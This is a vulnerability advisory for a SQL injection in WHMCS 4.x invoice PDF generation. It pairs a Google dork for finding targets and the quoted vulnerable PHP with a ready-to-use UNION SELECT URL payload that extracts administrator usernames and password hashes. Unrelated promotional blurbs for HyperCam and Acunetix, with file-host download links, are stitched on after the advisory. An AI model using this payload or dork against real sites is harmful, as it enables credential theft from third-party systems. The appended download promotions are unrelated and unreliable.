# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php‎"‎
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    - Vulnerable Code Snippet :
   
      LINE 582: function pdfInvoice($id)
      LINE 583: {
      LINE 686: if ($CONFIG['GroupSimilarLineItems'])
      LINE 687: {
      LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
      LINE 689: }
     
     As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
     It appears that pdfInvoice function is being called at "/dl.php" file as the following:
   
   
      LINE 21: if ($type == 'i')
      LINE 22: {
      LINE 23: $result     = select_query('tblinvoices', '', array(
      LINE 24: 'id' => $id
      LINE 25: ));
      LINE 26: $data       = mysql_fetch_array($result);
      LINE 27: $invoiceid  = $data['id'];
      LINE 28: $invoicenum = $data['invoicenum'];
      LINE 29: $userid     = $data['userid'];
      LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
      LINE 31: {
      LINE 32: downloadLogin();
      LINE 33: }
      LINE 34: if (!$invoicenum)
      LINE 35: {
      LINE 36: $invoicenum = $invoiceid;
      LINE 37: }
      LINE 38: require('includes/clientfunctions.php');
      LINE 39: require('includes/countries.php');
      LINE 40: require('includes/invoicefunctions.php');
      LINE 41: require('includes/tcpdf.php');
      LINE 42: $pdfdata = pdfInvoice($id);
      LINE 43: header('Pragma: public');
      LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
      LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
      LINE 47: header('Cache-Control: private', false);
      LINE 48: header('Content-Type: application/octet-stream');
      LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
      LINE 50: header('Content-Transfer-Encoding: binary');
      LINE 51: echo $pdfdata;
      LINE 52: exit();
      LINE 53: return 1;
      LINE 54: }
     
     
      As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
      Afterwards it force the browser to download the generated invoice in PDF format
   
      - Proof of Concept for Exploitation
   
        To Dump Administrator Credentials (user & pass):
     
        http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
     
        ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
       
      - Precondition to Successfully Exploit the Vulnerability:
   
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )

      - Credits:

        Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

HyperCam is powerful video capture software that records AVI movies (screencam) directly from your monitor, for software presentations, software training, demos, tutorials, and fun! HyperCam supports text annotations, sound, and screen notes (great for creating automated software demos!).

You can also select Frame rate and compression quality prior to video capture. This format can be played under Windows, as well as the Internet, unlike other programs that use proprietary formats that may need special viewers and be difficult, if not impossible, to edit.

HyperCam captures the action from your Windows screen and saves it to AVI (Audio-Video Interleaved) movie file. Sound from your system microphone is also recorded. Please note that HyperCam is not intended for re-recording of other video clips from the screen (e.g. playing in Media Player, RealVideo, QuickTime etc.), but rather for creating regular software presentations, tutorial, demos etc.

Download: Mirrorcreator Solidfiles

Audit your website security with Acunetix Web Vulnerability Scanner. As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. Firewalls, SSL and locked-down servers are futile against web application hacking! Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right in to the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.

Download: Solidfiles Mirrorcreator